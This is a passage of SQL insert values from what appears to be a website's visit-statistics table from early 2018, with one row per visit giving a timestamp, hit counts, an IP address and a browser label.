ther'),(205506,1517671650,1,0,1,0,'66.249.64.14',''),(205507,1517672045,1,1,0,0,'5.45.207.49','other'),(205508,1517672051,1,1,0,0,'93.75.8.57','firefox'),(205509,1517672189,1,0,1,0,'66.249.64.67',''),(205510,1517672390,1,1,0,0,'54.36.149.26','other'),(205511,1517672877,1,1,0,0,'54.36.149.65','other'),(205512,1517673073,1,1,0,0,'91.196.178.162','chrome'),(205513,1517673216,1,1,0,0,'91.196.178.52','chrome'),(205514,1517673792,1,1,0,0,'178.154.200.32','other'),(205515,1517673910,1,1,0,0,'46.107.227.138','firefox'),(205516,1517673977,2,2,0,0,'37.53.230.248','chrome'),(205517,1517674392,1,1,0,0,'91.196.178.52','chrome'),(205518,1517674416,1,1,0,0,'54.36.149.91','other'),(205519,1517674419,3,3,0,0,'216.244.66.246','other'),(205520,1517674691,2,2,0,0,'91.124.238.160','chrome'),(205521,1517674831,1,1,0,0,'51.255.71.128','other'),(205522,1517674891,1,1,0,0,'37.9.113.138','other'),(205523,1517674981,14,14,0,0,'138.201.215.222','chrome'),(205524,1517674987,4,4,0,0,'216.244.66.194','other'),(205525,1517675096,1,1,0,0,'54.36.149.21','other'),(205526,1517675319,1,1,0,0,'137.74.207.109','other'),(205527,1517676155,1,1,0,0,'54.36.148.132','other'),(205528,1517676352,1,1,0,0,'13.56.229.65','chrome'),(205529,1517676452,1,0,1,0,'66.249.64.73',''),(205530,1517676453,1,1,0,0,'37.9.113.132','other'),(205531,1517676489,1,1,0,0,'37.9.113.110','other'),(205532,1517676682,1,1,0,0,'37.55.150.125','chrome'),(205533,1517677164,1,1,0,0,'54.36.149.21','other'),(205534,1517678539,2,2,0,0,'46.211.98.120','chrome'),(205535,1517678661,2,2,0,0,'54.36.148.85','other'),(205536,1517679718,1,1,0,0,'54.36.149.13','other'),(205537,1517679723,1,1,0,0,'37.9.113.134','other'),(205538,1517680058,1,1,0,0,'74.115.214.136','other'),(205539,1517680132,1,1,0,0,'51.255.71.126','other'),(205540,1517680429,1,1,0,0,'8.29.198.25','other'),(205541,1517680822,1,1,0,0,'51.255.71.101','other'),(205542,1517681299,1,1,0,0,'51.255.71.127','other'),(205543,1517681714,1,1,0,0,'54.36.149.25','other'),(205544,1517681905,1,1,0,0,'54.36.149.43','other'),(205545,1517682266,1,1,0,0,'213.180.203.40','other'),(205546,1517683470,2,2,0,0,'77.222.156.116','chrome'),(205547,1517683482,1,1,0,0,'54.36.149.12','other'),(205548,1517683501,1,1,0,0,'66.249.64.14','chrome'),(205549,1517683721,1,1,0,0,'74.115.214.141','other'),(205550,1517684450,1,1,0,0,'157.55.39.104','other'),(205551,1517684469,1,1,0,0,'178.154.171.60','other'),(205552,1517684585,1,1,0,0,'137.74.207.102','other'),(205553,1517684955,1,1,0,0,'54.36.148.249','other'),(205554,1517685060,1,1,0,0,'66.249.64.71','chrome'),(205555,1517685185,1,1,0,0,'5.45.207.82','other'),(205556,1517685584,1,0,1,0,'66.249.64.67',''),(205557,1517685727,3,3,0,0,'176.31.30.184','other'),(205558,1517685911,1,1,0,0,'54.36.148.250','other'),(205559,1517686066,1,1,0,0,'54.36.149.65','other'),(205560,1517686578,1,1,0,0,'66.249.64.73','chrome'),(205561,1517686663,1,1,0,0,'207.46.13.102','other'),(205562,1517686944,1,1,0,0,'54.36.149.90','other'),(205563,1517686976,1,0,1,0,'66.249.64.71',''),(205564,1517687245,1,1,0,0,'54.36.148.167','other'),(205565,1517688539,1,1,0,0,'216.244.66.237','other'),(205566,1517688762,1,0,1,0,'66.249.64.71',''),(205567,1517689463,1,1,0,0,'51.255.71.111','other'),(205568,1517690751,1,0,1,0,'66.249.64.15',''),(205569,1517691260,1,1,0,0,'8.29.198.27','other'),(205570,1517691284,1,1,0,0,'213.180.203.40','other'),(205571,1517691727,1,1,0,0,'51.255.71.100','other'),(205572,1517693121,2,2,0,0,'37.9.113.134','other'),(205573,1517693262,1,1,0,0,'51.255.71.118','other'),(205574,1517693389,1,1,0,0,'87.250.224.39','other'),(205575,1517693522,1,1,0,0,'178.95.189.235','chrome'),(205576,1517694743,1,0,1,0,'66.249.64.71',''),(205577,1517694882,1,1,0,0,'37.9.113.132','other'),(205578,1517695531,1,1,0,0,'51.255.71.130','other'),(205579,1517695559,1,1,0,0,'51.255.71.116','other'),(205580,1517695561,1,1,0,0,'51.255.71.98','other'),(205581,1517695570,1,1,0,0,'176.123.10.105','firefox'),(205582,1517695908,1,1,0,0,'51.255.71.121','other'),(205583,1517696562,1,1,0,0,'87.250.224.85','other'),(205584,1517696747,1,1,0,0,'178.154.171.81','other'),(205585,1517697159,1,1,0,0,'93.72.11.240','chrome'),(205586,1517697633,35,35,0,0,'191.96.249.71','other'),(205587,1517698111,1,1,0,0,'54.36.148.102','other'),(205588,1517698604,1,1,0,0,'54.165.59.7','other'),(205589,1517698672,1,1,0,0,'54.36.149.35','other'),(205590,1517698745,1,1,0,0,'217.69.133.246','other'),(205591,1517698758,1,1,0,0,'37.9.113.80','other'),(205592,1517699195,1,1,0,0,'164.132.162.153','other'),(205593,1517699520,1,1,0,0,'51.255.71.112','other'),(205594,1517699798,1,1,0,0,'157.55.39.104','other'),(205595,1517700590,2,2,0,0,'66.249.64.71','chrome'),(205596,1517700742,1,1,0,0,'54.36.148.126','other'),(205597,1517700758,1,1,0,0,'164.132.164.180','other'),(205598,1517701005,1,1,0,0,'51.255.71.120','other'),(205599,1517701342,1,1,0,0,'66.249.64.67','chrome'),(205600,1517702094,1,1,0,0,'8.29.198.27','other'),(205601,1517702211,1,1,0,0,'141.8.142.50','other'),(205602,1517703154,1,1,0,0,'66.249.64.71','chrome'),(205603,1517703285,1,0,1,0,'66.249.64.73',''),(205604,1517703675,1,1,0,0,'54.36.148.241','other'),(205605,1517703733,1,1,0,0,'54.36.148.250','other'),(205606,1517703853,1,1,0,0,'5.58.234.190','opera'),(205607,1517704043,1,0,1,0,'66.249.64.67',''),(205608,1517704069,1,1,0,0,'51.255.71.131','other'),(205609,1517704691,1,1,0,0,'37.9.113.56','other'),(205610,1517704841,1,1,0,0,'54.36.149.71','other'),(205611,1517704878,1,1,0,0,'54.36.149.7','other'),(205612,1517705362,1,1,0,0,'54.36.148.43','other'),(205613,1517706100,1,1,0,0,'157.55.39.221','other'),(205614,1517706404,1,1,0,0,'141.8.142.126','other'),(205615,1517706424,1,1,0,0,'51.255.71.115','other'),(205616,1517706531,1,1,0,0,'54.36.149.59','other'),(205617,1517706738,1,1,0,0,'54.36.149.43','other'),(205618,1517707695,1,1,0,0,'51.255.71.114','other'),(205619,1517707758,1,1,0,0,'5.45.207.69','other'),(205620,1517708257,4,3,1,0,'66.249.64.71',''),(205621,1517708417,3,0,3,0,'66.249.64.67',''),(205622,1517708506,1,0,1,0,'66.249.64.73',''),(205623,1517708537,1,1,0,0,'141.8.142.123','other'),(205624,1517708620,2,2,0,0,'66.249.64.73','chrome'),(205625,1517708697,1,1,0,0,'37.9.113.60','other'),(205626,1517709195,1,1,0,0,'51.255.71.128','other'),(205627,1517710640,1,1,0,0,'54.36.149.97','other'),(205628,1517710779,1,1,0,0,'137.74.201.100','other'),(205629,1517710909,1,1,0,0,'91.209.11.236','other'),(205630,1517711471,1,1,0,0,'54.36.148.91','other'),(205631,1517711607,1,1,0,0,'199.30.24.147','other'),(205632,1517711641,1,1,0,0,'54.36.148.167','other'),(205633,1517712268,1,1,0,0,'54.36.149.65','other'),(205634,1517712291,1,1,0,0,'54.36.149.28','other'),(205635,1517712776,1,1,0,0,'95.108.213.24','other'),(205636,1517712813,2,0,2,0,'66.249.64.73',''),(205637,1517712846,2,2,0,0,'66.249.64.67','chrome'),(205638,1517712919,1,1,0,0,'66.249.64.71','chrome'),(205639,1517712922,1,1,0,0,'8.29.198.25','other'),(205640,1517713278,1,1,0,0,'137.74.207.109','other'),(205641,1517713429,1,0,1,0,'66.249.64.15',''),(205642,1517713970,1,1,0,0,'54.36.148.235','other'),(205643,1517714125,2,2,0,0,'51.255.71.129','other'),(205644,1517714423,1,1,0,0,'51.255.71.130','other'),(205645,1517714622,1,1,0,0,'91.209.11.236','other'),(205646,1517714691,1,0,1,0,'66.249.64.73',''),(205647,1517714857,1,1,0,0,'51.255.71.113','other'),(205648,1517715013,1,1,0,0,'54.36.148.132','other'),(205649,1517715489,1,1,0,0,'216.244.66.237','other'),(205650,1517715875,1,1,0,0,'178.154.200.7','other'),(205651,1517716046,1,1,0,0,'207.46.13.180','other'),(205652,1517716062,1,0,1,0,'66.249.64.14',''),(205653,1517716293,1,1,0,0,'95.221.253.179','msie'),(205654,1517716531,1,1,0,0,'54.36.149.25','other'),(205655,1517716775,1,1,0,0,'87.250.224.46','other'),(205656,1517717114,3,3,0,0,'37.53.230.248','chrome'),(205657,1517717142,12,12,0,0,'69.197.163.234','other'),(205658,1517717507,1,1,0,0,'207.46.13.180','other'),(205659,1517717589,1,1,0,0,'54.36.149.13','other'),(205660,1517717731,1,1,0,0,'54.36.149.59','other'),(205661,1517718070,1,1,0,0,'5.45.207.58','other'),(205662,1517718151,1,1,0,0,'51.255.71.130','other'),(205663,1517718989,1,1,0,0,'216.244.66.237','other'),(205664,1517719216,1,1,0,0,'54.36.148.63','other'),(205665,1517719758,1,1,0,0,'5.45.207.69','other'),(205666,1517720098,1,1,0,0,'54.36.149.65','other'),(205667,1517720497,1,1,0,0,'54.36.148.59','other'),(205668,1517720715,1,1,0,0,'141.8.142.123','other'),(205669,1517720905,1,1,0,0,'51.255.71.115','other'),(205670,1517721347,1,1,0,0,'74.115.214.153','other'),(205671,1517721537,1,1,0,0,'164.132.162.159','other'),(205672,1517721711,1,1,0,0,'54.36.148.168','other'),(205673,1517721862,1,0,1,0,'66.249.64.67',''),(205674,1517722185,1,1,0,0,'54.36.148.112','other'),(205675,1517722402,1,1,0,0,'164.132.164.180','other'),(205676,1517722873,1,1,0,0,'54.36.149.28','other'),(205677,1517722976,1,1,0,0,'54.36.149.8','other'),(205678,1517723180,1,1,0,0,'54.36.148.17','other'),(205679,1517723215,1,1,0,0,'54.36.149.70','other'),(205680,1517723283,1,1,0,0,'54.36.148.63','other'),(205681,1517723560,1,1,0,0,'54.36.149.87','other'),(205682,1517723751,1,1,0,0,'8.29.198.26','other'),(205683,1517723860,1,1,0,0,'51.255.71.130','other'),(205684,1517725031,1,1,0,0,'54.36.149.41','other'),(205685,1517725410,1,1,0,0,'54.36.148.202','other'),(205686,1517725790,1,0,1,0,'68.180.229.52',''),(205687,1517726106,1,1,0,0,'54.36.149.14','other'),(205688,1517726530,1,1,0,0,'51.255.71.118','other'),(205689,1517726839,1,1,0,0,'37.9.113.134','other'),(205690,1517726958,1,1,0,0,'66.102.9.40','chrome'),(205691,1517726963,1,1,0,0,'66.102.9.38','chrome'),(205692,1517727120,1,1,0,0,'51.255.71.131','other'),(205693,1517727293,1,1,0,0,'54.36.148.102','other'),(205694,1517727339,1,0,1,0,'66.249.64.13',''),(205695,1517728254,1,1,0,0,'91.209.11.236','other'),(205696,1517728473,1,1,0,0,'54.36.149.12','other'),(205697,1517729333,1,1,0,0,'37.9.113.182','other'),(205698,1517729769,1,1,0,0,'54.36.148.17','other'),(205699,1517730006,2,2,0,0,'162.210.196.98','other'),(205700,1517730021,1,1,0,0,'66.249.64.71','chrome'),(205701,1517730079,1,1,0,0,'54.36.149.76','other'),(205702,1517730105,1,0,1,0,'66.249.64.67',''),(205703,1517730209,1,1,0,0,'95.27.128.23','msie'),(205704,1517730577,1,1,0,0,'54.36.148.42','other'),(205705,1517730800,1,1,0,0,'66.249.64.14','chrome'),(205706,1517731212,1,1,0,0,'51.255.71.128','other'),(205707,1517731598,1,1,0,0,'54.36.148.91','other'),(205708,1517731670,1,1,0,0,'54.36.149.65','other'),(205709,1517731707,1,1,0,0,'54.36.149.3','other'),(205710,1517732139,1,1,0,0,'54.36.148.206','other'),(205711,1517732209,1,1,0,0,'37.9.113.110','other'),(205712,1517732650,1,1,0,0,'188.230.43.254','other'),(205713,1517733485,1,1,0,0,'178.154.200.28','other'),(205714,1517733804,1,0,1,0,'68.180.229.52',''),(205715,1517734166,2,2,0,0,'91.196.178.61','chrome'),(205716,1517734585,1,1,0,0,'8.29.198.26','other'),(205717,1517734840,1,1,0,0,'54.36.149.12','other'),(205718,1517734873,1,1,0,0,'51.255.71.117','other'),(205719,1517735180,1,1,0,0,'80.84.181.41','firefox'),(205720,1517735272,1,1,0,0,'51.255.71.131','other'),(205721,1517735432,1,1,0,0,'46.211.6.34','chrome'),(205722,1517735511,1,1,0,0,'54.36.148.91','other'),(205723,1517735554,1,1,0,0,'137.74.201.100','other'),(205724,1517736085,2,2,0,0,'54.36.148.16','other'),(205725,1517736321,1,1,0,0,'51.255.71.110','other'),(205726,1517736342,6,6,0,0,'37.53.230.248','chrome'),(205727,1517737470,1,0,1,0,'66.249.64.73',''),(205728,1517737812,1,1,0,0,'54.36.148.241','other'),(205729,1517737832,2,2,0,0,'91.196.178.61','chrome'),(205730,1517737890,1,1,0,0,'46.211.112.113','chrome'),(205731,1517737934,1,1,0,0,'151.80.27.118','other'),(205732,1517738097,1,0,1,0,'66.249.64.67',''),(205733,1517738394,1,1,0,0,'54.36.149.21','other'),(205734,1517739025,1,1,0,0,'54.36.148.205','other'),(205735,1517739725,1,1,0,0,'37.9.113.60','other'),(205736,1517739807,1,1,0,0,'164.132.164.180','other'),(205737,1517740006,92,92,0,0,'69.30.198.178','other'),(205738,1517740528,1,1,0,0,'91.209.11.236','other'),(205739,1517740908,1,1,0,0,'51.255.71.115','other'),(205740,1517740913,10,10,0,0,'69.30.198.178','other'),(205741,1517740982,1,1,0,0,'87.250.224.46','other'),(205742,1517741292,1,1,0,0,'54.36.149.59','other'),(205743,1517742782,1,1,0,0,'54.36.148.206','other'),(205744,1517743094,1,0,1,0,'66.249.64.73',''),(205745,1517743123,1,1,0,0,'51.255.71.127','other'),(205746,1517743418,1,1,0,0,'37.9.113.115','other'),(205747,1517743592,1,1,0,0,'54.36.148.241','other'),(205748,1517743783,1,1,0,0,'54.36.149.28','other'),(205749,1517744373,1,1,0,0,'5.45.207.83','other'),(205750,1517745264,1,1,0,0,'137.74.207.102','other'),(205751,1517745409,1,1,0,0,'8.29.198.26','other'),(205752,1517745619,1,1,0,0,'37.9.113.157','other'),(205753,1517745656,1,1,0,0,'66.249.64.15','chrome'),(205754,1517745807,1,1,0,0,'66.249.64.73','chrome'),(205755,1517745886,1,1,0,0,'5.83.22.21','chrome'),(205756,1517746082,1,1,0,0,'66.249.64.71','chrome'),(205757,1517746378,1,1,0,0,'51.255.71.116','other'),(205758,1517746769,1,1,0,0,'51.255.71.112','other'),(205759,1517746968,1,0,1,0,'66.249.64.73',''),(205760,1517746984,1,1,0,0,'54.36.149.90','other'),(205761,1517747223,1,1,0,0,'69.30.198.186','other'),(205762,1517747927,1,1,0,0,'54.36.148.139','other'),(205763,1517748145,1,1,0,0,'54.36.148.244','other'),(205764,1517748264,1,1,0,0,'164.132.162.153','other'),(205765,1517748441,1,1,0,0,'51.255.71.133','other'),(205766,1517749175,1,1,0,0,'5.45.207.83','other'),(205767,1517749677,1,1,0,0,'51.255.71.126','other'),(205768,1517749804,1,1,0,0,'54.36.148.196','other'),(205769,1517749825,1,1,0,0,'157.55.39.104','other'),(205770,1517750118,1,1,0,0,'54.165.59.7','other'),(205771,1517750192,1,0,1,0,'66.249.64.71',''),(205772,1517750569,1,1,0,0,'216.244.66.237','other'),(205773,1517750767,1,1,0,0,'94.178.147.237','chrome'),(205774,1517751463,1,1,0,0,'37.9.113.114','other'),(205775,1517751727,1,0,1,0,'66.249.64.71',''),(205776,1517751996,1,0,1,0,'66.249.64.67',''),(205777,1517752194,1,1,0,0,'54.36.149.86','other'),(205778,1517752355,1,0,1,0,'66.249.64.14',''),(205779,1517752651,1,1,0,0,'54.36.149.39','other'),(205780,1517752836,2,2,0,0,'37.53.230.248','chrome'),(205781,1517753106,2,2,0,0,'91.196.178.35','chrome'),(205782,1517753412,1,1,0,0,'37.9.113.101','other'),(205783,1517753430,1,1,0,0,'54.36.148.42','other'),(205784,1517753605,1,1,0,0,'51.255.71.122','other'),(205785,1517753689,1,1,0,0,'54.36.149.71','other'),(205786,1517753753,2,2,0,0,'54.165.59.7','other'),(205787,1517754165,1,1,0,0,'141.8.142.50','other'),(205788,1517754533,1,1,0,0,'54.36.148.235','other'),(205789,1517755176,1,1,0,0,'54.165.59.7','other'),(205790,1517755249,1,1,0,0,'54.36.148.237','other'),(205791,1517755389,1,1,0,0,'54.36.149.7','other'),(205792,1517755430,1,1,0,0,'51.255.71.127','other'),(205793,1517755909,1,1,0,0,'54.36.148.17','other'),(205794,1517755987,2,2,0,0,'95.132.135.19','chrome'),(205795,1517756195,1,0,1,0,'66.249.64.67',''),(205796,1517756241,1,1,0,0,'8.29.198.25','other'),(205797,1517757085,1,1,0,0,'54.36.149.81','other'),(205798,1517757449,1,1,0,0,'40.77.167.189','other'),(205799,1517757660,1,1,0,0,'51.255.71.115','other'),(205800,1517758288,1,1,0,0,'178.154.171.56','other'),(205801,1517758321,1,1,0,0,'95.132.135.19','chrome'),(205802,1517759375,2,2,0,0,'212.113.43.80','chrome'),(205803,1517759476,1,1,0,0,'37.9.113.82','other'),(205804,1517759632,1,1,0,0,'54.165.59.7','other'),(205805,1517760136,2,2,0,0,'46.211.123.213','chrome'),(205806,1517760241,1,1,0,0,'54.36.149.41','other'),(205807,1517760307,1,1,0,0,'51.255.71.125','other'),(205808,1517761080,2,2,0,0,'178.151.131.40','chrome'),(205809,1517761284,1,1,0,0,'217.69.136.206','other'),(205810,1517761331,1,1,0,0,'92.113.190.211','other'),(205811,1517761632,1,1,0,0,'54.36.149.107','other'),(205812,1517761661,1,1,0,0,'54.36.148.243','other'),(205813,1517761735,1,1,0,0,'137.74.201.99','other'),(205814,1517761920,1,1,0,0,'93.72.181.50','chrome'),(205815,1517762115,1,1,0,0,'93.75.173.45','chrome'),(205816,1517762227,1,1,0,0,'137.74.207.170','other'),(205817,1517762876,1,1,0,0,'157.55.39.104','other'),(205818,1517762956,1,1,0,0,'54.36.148.235','other'),(205819,1517762978,1,1,0,0,'87.250.224.39','other'),(205820,1517763012,1,0,1,0,'66.249.64.73',''),(205821,1517763064,1,1,0,0,'54.36.149.76','other'),(205822,1517763328,1,1,0,0,'66.249.64.15','chrome'),(205823,1517763746,1,1,0,0,'216.244.66.237','other'),(205824,1517764272,1,1,0,0,'141.8.142.29','other'),(205825,1517764464,1,1,0,0,'164.132.162.157','other'),(205826,1517764616,1,1,0,0,'51.255.71.130','other'),(205827,1517764846,1,1,0,0,'46.242.71.201','firefox'),(205828,1517764873,1,1,0,0,'91.209.11.236','other'),(205829,1517765301,1,1,0,0,'54.36.148.170','other'),(205830,1517765998,1,1,0,0,'5.45.207.69','other'),(205831,1517766677,1,1,0,0,'54.165.59.7','other'),(205832,1517767048,1,1,0,0,'54.36.149.50','other'),(205833,1517767076,1,1,0,0,'8.29.198.25','other'),(205834,1517767460,1,1,0,0,'164.132.162.158','other'),(205835,1517767469,1,1,0,0,'51.255.71.133','other'),(205836,1517767495,1,1,0,0,'54.36.148.206','other'),(205837,1517767688,1,1,0,0,'178.151.131.40','chrome'),(205838,1517768063,2,2,0,0,'212.113.43.80','chrome'),(205839,1517768107,1,1,0,0,'54.36.149.52','other'),(205840,1517768243,1,1,0,0,'54.36.148.231','other'),(205841,1517768353,1,1,0,0,'51.255.71.127','other'),(205842,1517768437,1,1,0,0,'54.36.149.107','other'),(205843,1517768774,1,1,0,0,'54.36.149.71','other'),(205844,1517769116,1,1,0,0,'151.80.27.118','other'),(205845,1517769979,1,1,0,0,'178.154.171.60','other'),(205846,1517769983,1,1,0,0,'178.154.171.10','other'),(205847,1517770113,1,1,0,0,'54.36.148.178','other'),(205848,1517770682,1,1,0,0,'178.154.171.81','other'),(205849,1517771465,1,1,0,0,'178.154.200.32','other'),(205850,1517771542,1,1,0,0,'5.142.9.193','chrome'),(205851,1517771674,1,1,0,0,'54.36.148.79','other'),(205852,1517771883,1,1,0,0,'54.36.149.84','other'),(205853,1517772210,1,1,0,0,'66.249.64.73','chrome'),(205854,1517772635,1,0,1,0,'66.249.64.71',''),(205855,1517772778,1,1,0,0,'54.36.149.85','other'),(205856,1517773159,1,1,0,0,'77.37.220.207','msie'),(205857,1517773642,1,1,0,0,'54.36.148.114','other'),(205858,1517773669,1,1,0,0,'54.36.148.206','other'),(205859,1517774284,1,1,0,0,'54.36.149.107','other'),(205860,1517774327,1,1,0,0,'54.36.148.251','other'),(205861,1517774349,1,1,0,0,'54.36.148.112','other'),(205862,1517774408,1,1,0,0,'37.9.113.134','other'),(205863,1517775094,1,1,0,0,'51.255.71.115','other'),(205864,1517775191,1,1,0,0,'54.36.148.241','other'),(205865,1517775634,1,1,0,0,'54.36.149.81','other'),(205866,1517776281,1,0,1,0,'66.249.64.71',''),(205867,1517776300,1,1,0,0,'54.36.149.26','other'),(205868,1517776582,1,1,0,0,'216.244.66.237','other'),(205869,1517776691,1,1,0,0,'217.69.133.217','other'),(205870,1517776845,1,1,0,0,'54.36.149.18','other'),(205871,1517777460,1,1,0,0,'54.36.149.14','other'),(205872,1517777649,1,1,0,0,'51.255.71.113','other'),(205873,1517777709,1,1,0,0,'37.9.113.100','other'),(205874,1517777899,1,1,0,0,'8.29.198.26','other'),(205875,1517780914,2,2,0,0,'91.196.178.164','chrome'),(205876,1517781085,1,1,0,0,'87.250.224.96','other'),(205877,1517783344,1,1,0,0,'87.250.224.39','other'),(205878,1517784203,1,1,0,0,'176.193.132.167','msie'),(205879,1517784533,1,1,0,0,'40.77.167.56','other'),(205880,1517786508,1,1,0,0,'37.9.113.80','other'),(205881,1517786936,3,0,3,0,'66.249.64.67',''),(205882,1517786989,1,0,1,0,'66.249.64.71',''),(205883,1517787008,2,0,2,0,'66.249.64.73',''),(205884,1517787054,1,1,0,0,'40.77.167.56','other'),(205885,1517788519,1,1,0,0,'178.154.171.10','other'),(205886,1517788603,1,1,0,0,'5.45.207.58','other'),(205887,1517788737,1,1,0,0,'8.29.198.26','other'),(205888,1517791879,2,2,0,0,'66.249.64.71','chrome'),(205889,1517792070,1,1,0,0,'5.9.144.234','other'),(205890,1517795030,1,1,0,0,'178.154.171.88','other'),(205891,1517795316,1,1,0,0,'66.249.64.71','chrome'),(205892,1517796632,1,1,0,0,'216.244.66.237','other'),(205893,1517797902,1,1,0,0,'217.69.133.249','other'),(205894,1517799055,1,1,0,0,'87.250.224.46','other'),(205895,1517799569,1,1,0,0,'8.29.198.27','other'),(205896,1517799629,1,1,0,0,'216.244.66.237','other'),(205897,1517799663,1,1,0,0,'95.108.181.102','other'),(205898,1517802342,1,1,0,0,'217.69.136.208','other'),(205899,1517802515,1,1,0,0,'5.165.235.82','msie'),(205900,1517802774,1,1,0,0,'37.9.113.82','other'),(205901,1517803058,1,0,1,0,'66.249.64.73',''),(205902,1517804031,1,1,0,0,'66.249.64.73','chrome'),(205903,1517804052,2,2,0,0,'212.113.43.80','chrome'),(205904,1517804075,1,1,0,0,'37.9.113.82','other'),(205905,1517804503,1,1,0,0,'178.154.200.8','other'),(205906,1517804868,1,0,1,0,'66.249.66.155',''),(205907,1517805324,1,1,0,0,'40.77.167.189','other'),(205908,1517805864,1,0,1,0,'66.249.66.157',''),(205909,1517807996,1,0,1,0,'66.249.66.155',''),(205910,1517809471,1,1,0,0,'37.9.113.138','other'),(205911,1517810425,1,1,0,0,'8.29.198.26','other'),(205912,1517810494,1,1,0,0,'66.249.66.157','chrome'),(205913,1517811213,1,1,0,0,'141.8.132.22','other'),(205914,1517811522,263,263,0,0,'91.121.116.72','other'),(205915,1517811702,4,4,0,0,'91.196.178.76','chrome'),(205916,1517811761,1,1,0,0,'37.9.113.100','other'),(205917,1517812170,1,1,0,0,'178.154.171.4','other'),(205918,1517812423,33,33,0,0,'91.121.116.72','other'),(205919,1517812470,1,1,0,0,'199.30.24.201','other'),(205920,1517812870,1,1,0,0,'77.111.244.42','chrome'),(205921,1517813943,2,2,0,0,'91.196.178.91','chrome'),(205922,1517814178,1,1,0,0,'5.45.207.58','other'),(205923,1517814909,1,1,0,0,'141.8.132.22','other'),(205924,1517815168,2,2,0,0,'91.196.178.166','chrome'),(205925,1517815270,2,2,0,0,'178.154.171.60','other'),(205926,1517815297,2,2,0,0,'188.163.17.36','chrome'),(205927,1517815458,10,10,0,0,'195.201.24.79','other'),(205928,1517815645,1,1,0,0,'37.9.113.182','other'),(205929,1517816087,1,1,0,0,'91.196.178.167','chrome'),(205930,1517816222,2,2,0,0,'78.111.185.62','chrome'),(205931,1517816347,1,1,0,0,'91.196.178.166','chrome'),(205932,1517816380,1,1,0,0,'40.77.167.189','other'),(205933,1517816516,1,1,0,0,'37.53.90.175','chrome'),(205934,1517816562,24,24,0,0,'144.76.115.190','other'),(205935,1517816810,3,3,0,0,'91.196.178.76','chrome'),(205936,1517817740,1,1,0,0,'91.196.178.76','chrome'),(205937,1517819702,2,2,0,0,'195.230.119.34','chrome'),(205938,1517819729,1,1,0,0,'217.69.133.240','other'),(205939,1517819863,2,2,0,0,'91.196.178.76','chrome'),(205940,1517820291,1,1,0,0,'157.55.39.178','other'),(205941,1517820296,1,0,1,0,'66.249.66.155',''),(205942,1517820367,1,0,1,0,'66.249.66.157',''),(205943,1517820386,1,0,1,0,'66.249.66.74',''),(205944,1517820903,1,1,0,0,'213.180.203.40','other'),(205945,1517820913,1,1,0,0,'91.196.178.166','firefox'),(205946,1517821023,1,1,0,0,'37.9.113.80','other'),(205947,1517821260,1,1,0,0,'8.29.198.25','other'),(205948,1517821267,1,1,0,0,'91.196.177.15','chrome'),(205949,1517821382,1,1,0,0,'157.55.39.178','other'),(205950,1517821637,1,1,0,0,'193.109.248.254','chrome'),(205951,1517822148,1,1,0,0,'95.133.199.144','opera'),(205952,1517822403,1,1,0,0,'217.69.133.192','other'),(205953,1517822656,1,1,0,0,'216.244.66.237','other'),(205954,1517822934,1,1,0,0,'5.228.150.107','msie'),(205955,1517822972,1,1,0,0,'37.9.113.132','other'),(205956,1517822978,1,1,0,0,'66.249.66.157','chrome'),(205957,1517823025,1,1,0,0,'66.249.66.155','chrome'),(205958,1517823188,1,1,0,0,'37.55.134.148','chrome'),(205959,1517823480,1,1,0,0,'40.77.167.56','other'),(205960,1517823508,1,1,0,0,'37.9.113.101','other'),(205961,1517824184,1,1,0,0,'91.196.178.133','chrome'),(205962,1517824225,23,23,0,0,'144.217.15.198','other'),(205963,1517824412,1,1,0,0,'188.230.43.254','other'),(205964,1517824861,1,1,0,0,'188.32.5.176','chrome'),(205965,1517824907,1,1,0,0,'37.52.21.39','firefox'),(205966,1517825165,2,2,0,0,'95.132.62.76','firefox'),(205967,1517825413,1,1,0,0,'94.179.129.198','chrome'),(205968,1517826400,1,1,0,0,'66.249.66.156','chrome'),(205969,1517826594,1,1,0,0,'66.249.66.74','chrome'),(205970,1517826971,1,1,0,0,'37.9.113.182','other'),(205971,1517827226,1,1,0,0,'40.77.167.56','other'),(205972,1517827945,1,1,0,0,'46.200.47.27','chrome'),(205973,1517828515,1,1,0,0,'5.45.207.58','other'),(205974,1517828613,2,2,0,0,'46.201.241.5','chrome'),(205975,1517829879,1,1,0,0,'141.8.142.50','other'),(205976,1517829982,1,1,0,0,'87.250.224.46','other'),(205977,1517830307,1,1,0,0,'95.134.0.100','chrome'),(205978,1517831267,1,1,0,0,'95.108.181.111','other'),(205979,1517831270,1,1,0,0,'87.250.224.85','other'),(205980,1517831862,20,20,0,0,'91.121.116.72','other'),(205981,1517832093,1,1,0,0,'8.29.198.26','other'),(205982,1517832257,2,2,0,0,'141.8.142.126','other'),(205983,1517833563,2,2,0,0,'91.196.178.66','chrome'),(205984,1517833726,1,1,0,0,'80.78.39.180','chrome'),(205985,1517834258,1,1,0,0,'40.77.167.122','other'),(205986,1517834322,1,1,0,0,'176.113.209.232','chrome'),(205987,1517834373,1,1,0,0,'40.77.167.32','other'),(205988,1517834627,1,1,0,0,'80.78.39.180','chrome'),(205989,1517834707,1,1,0,0,'91.196.178.163','chrome'),(205990,1517834818,1,1,0,0,'157.55.39.233','other'),(205991,1517834925,1,1,0,0,'95.108.181.111','other'),(205992,1517834941,1,1,0,0,'37.9.113.115','other'),(205993,1517834944,1,1,0,0,'178.154.171.4','other'),(205994,1517834946,1,1,0,0,'87.250.224.39','other'),(205995,1517834949,1,1,0,0,'141.8.142.126','other'),(205996,1517834955,1,1,0,0,'141.8.132.22','other'),(205997,1517834958,1,1,0,0,'5.45.207.69','other'),(205998,1517834961,2,2,0,0,'37.9.113.63','other'),(205999,1517834964,1,1,0,0,'5.45.207.30','other'),(206000,1517835204,1,1,0,0,'159.89.29.85','other'),(206001,1517835318,1,1,0,0,'78.111.186.218','chrome'),(206002,1517835751,1,1,0,0,'80.78.39.180','chrome'),(206003,1517835792,1,0,1,0,'66.249.66.157',''),(206004,1517835894,1,1,0,0,'176.228.200.35','chrome'),(206005,1517836200,1,1,0,0,'178.154.171.24','other'),(206006,1517836307,1,1,0,0,'46.133.13.21','chrome'),(206007,1517836478,1,0,1,0,'66.249.66.75',''),(206008,1517836811,1,1,0,0,'37.52.21.39','firefox'),(206009,1517836865,1,1,0,0,'37.9.113.82','other'),(206010,1517837294,2,2,0,0,'91.196.178.1','chrome'),(206011,1517837533,1,1,0,0,'141.8.142.50','other'),(206012,1517838204,1,1,0,0,'213.180.203.40','other'),(206013,1517838395,1,1,0,0,'178.154.200.32','other'),(206014,1517838587,4,4,0,0,'92.112.125.243','chrome'),(206015,1517838781,1,1,0,0,'77.222.134.101','other'),(206016,1517839530,1,1,0,0,'91.196.178.93','firefox'),(206017,1517839867,